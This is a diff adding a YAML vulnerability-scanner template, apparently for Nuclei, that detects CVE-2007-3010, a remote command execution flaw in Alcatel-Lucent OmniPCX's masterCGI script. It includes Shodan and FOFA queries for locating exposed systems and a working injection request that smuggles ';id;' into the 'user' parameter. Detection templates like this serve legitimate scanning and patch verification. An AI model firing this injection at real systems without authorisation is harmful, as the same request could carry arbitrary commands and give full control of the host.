CVE-2007-3010

http/cves/2007/CVE-2007-3010.yaml

@@ -0,0 +1,55 @@
+id: CVE-2007-3010
+
+info:
+  name: Alcatel-Lucent OmniPCX - Remote Command Execution
+  author: king-alexander
+  severity: critical
+  description: |
+    The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
+  impact: |
+    Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers.
+  remediation: |
+    Update to supported versions that filter shell metacharacters in the "user" parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-3010
+    - https://marc.info/?l=full-disclosure&m=119002152126755&w=2
+    - http://www.redteam-pentesting.de/advisories/rt-sa-2007-001.php
+    - http://www.vupen.com/english/advisories/2007/3185
+    - http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm
+  classification:
+    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
+    cvss-score: 10
+    cve-id: CVE-2007-3010
+    cwe-id: CWE-20
+    epss-score: 0.97264
+    epss-percentile: 0.99824
+    cpe: cpe:2.3:a:alcatel-lucent:omnipcx:7.1:*:enterprise:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: alcatel-lucent
+    product: omnipcx
+    fofa-query: app="Alcatel_Lucent-OmniPCX-Enterprise"
+    shodan-query: title:"OmniPCX for Enterprise"
+  tags: cve,cve2007,kev,rce,alcatel
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;id;"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "uid=[0-9]+.*gid=[0-9]+.*"
+
+      - type: word
+        part: body
+        words:
+          - "<TITLE>master</TITLE>"
+
+      - type: status
+        status:
+          - 200